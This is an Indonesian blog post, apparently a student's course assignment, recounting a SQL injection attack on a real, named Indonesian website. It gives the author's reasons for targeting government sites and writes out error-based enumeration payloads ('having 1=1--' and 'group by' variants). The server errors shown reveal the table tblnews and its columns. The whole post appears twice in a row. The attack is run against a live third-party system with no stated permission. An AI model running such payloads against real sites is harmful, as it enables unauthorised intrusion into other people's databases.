Sebelum melakukan Injection alangkah baiknya jika kita memahami tentang apa yang dimaksud SQL Injection. SQL Injection adalah salah satu jenis aksi hacking pada sistem aplikasi komputer dengan cara memasukkan statement-statement SQL melalui manipulasi data input suatu aplikasi, sehingga penyerang dapat mengakses basis data di komputer tersebut.
Dalam tugas yang ke-2 ini bisa termasuk untung-untungan. Kalo beruntung dalam sehari saja bisa selesai sekalian sama nulisnya (dokumentasi). Dan kalo lagi apes sampai seminggu pun belum tentu dapat website yang bisa di injeksi lewat SQL.
Alhamdulillah saya termasuk golongan pertama, sore setelah pulang dari kuliah Keamanan Informasi Lanjut, saya berhasil melakukan injeksi pada website milik instansi pemerintah. Namun itu pun setelah membrowse puluhan website. Kenapa sasaran saya yang pertama adalah website milik pemerintah, simple saja sebenarnya, website milik pemerintah cenderung di buat asal-asalan (walau tidak semua), yang tentunya mengabaikan aspek keamanan. Website itu adalah http://www.plnbali.co.id yang tampilan mukanya adalah
Setelah saya masukkan (‘) single quote pada kolom pencarian di atas, maka yang muncul error di bawah ini :
Jreeeng....
Muncul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' order by tanggal desc'.
/berita.asp, line 17
Dan berhasil.... Selanjutnya saya mencoba untuk memasukkan string debugging SQL code dengan mengetik “‘ Having 1=1-- “ (tanpa double quote) ke dalam menu pencarian. Dan muncul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/berita.asp, line 17
Dari sini dapat diketahui bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom = ID
Setelah itu saya ketikkan lagi “’ Group By tblnews.ID having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Artinya bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom1 = ID
Nama Kolom2= Tanggal
Kemudian itu saya ketikkan lagi “’ Group By tblnews.ID,tblnews.Tanggal having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Jam' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Artinya bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom1 = ID
Nama Kolom2= Tanggal
Nama Kolom3= Jam
Kemudian itu saya ketikkan lagi “’ Group By tblnews.ID,tblnews.Tanggal,tblnews.Jam having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Headline2' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Demikian seterusnya sampai dengan saya mendapatkan data sbagai berikut :
Nama Tabel : tblnews
Nama kolom 1 : ID
Nama kolom 2 : Tanggal
Nama kolom 3 : Jam
Nama kolom 4 : Headline2
Nama kolom 5 : Beritaprev
Nama kolom 6 : Berita
Sekian, terima kasih
Sebelum melakukan Injection alangkah baiknya jika kita memahami tentang apa yang dimaksud SQL Injection. SQL Injection adalah salah satu jenis aksi hacking pada sistem aplikasi komputer dengan cara memasukkan statement-statement SQL melalui manipulasi data input suatu aplikasi, sehingga penyerang dapat mengakses basis data di komputer tersebut.
Dalam tugas yang ke-2 ini bisa termasuk untung-untungan. Kalo beruntung dalam sehari saja bisa selesai sekalian sama nulisnya (dokumentasi). Dan kalo lagi apes sampai seminggu pun belum tentu dapat website yang bisa di injeksi lewat SQL.
Alhamdulillah saya termasuk golongan pertama, sore setelah pulang dari kuliah Keamanan Informasi Lanjut, saya berhasil melakukan injeksi pada website milik instansi pemerintah. Namun itu pun setelah membrowse puluhan website. Kenapa sasaran saya yang pertama adalah website milik pemerintah, simple saja sebenarnya, website milik pemerintah cenderung di buat asal-asalan (walau tidak semua), yang tentunya mengabaikan aspek keamanan. Website itu adalah http://www.plnbali.co.id yang tampilan mukanya adalah
Setelah saya masukkan (‘) single quote pada kolom pencarian di atas, maka yang muncul error di bawah ini :
Jreeeng....
Muncul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' order by tanggal desc'.
/berita.asp, line 17
Dan berhasil.... Selanjutnya saya mencoba untuk memasukkan string debugging SQL code dengan mengetik “‘ Having 1=1-- “ (tanpa double quote) ke dalam menu pencarian. Dan muncul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/berita.asp, line 17
Dari sini dapat diketahui bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom = ID
Setelah itu saya ketikkan lagi “’ Group By tblnews.ID having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Artinya bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom1 = ID
Nama Kolom2= Tanggal
Kemudian itu saya ketikkan lagi “’ Group By tblnews.ID,tblnews.Tanggal having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Jam' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Artinya bahwa dalam basis data website www.plnbali.co.id terdapat
Nama Tabel = tblnews
Nama Kolom1 = ID
Nama Kolom2= Tanggal
Nama Kolom3= Jam
Kemudian itu saya ketikkan lagi “’ Group By tblnews.ID,tblnews.Tanggal,tblnews.Jam having 1=1--“ (tanpa double quote) ke dalam menu pencarian, maka mucul error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblnews.Headline2' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/berita.asp, line 17
Demikian seterusnya sampai dengan saya mendapatkan data sbagai berikut :
Nama Tabel : tblnews
Nama kolom 1 : ID
Nama kolom 2 : Tanggal
Nama kolom 3 : Jam
Nama kolom 4 : Headline2
Nama kolom 5 : Beritaprev
Nama kolom 6 : Berita
Sekian, terima kasih
1 komentar:
mangstaaps ..
Posting Komentar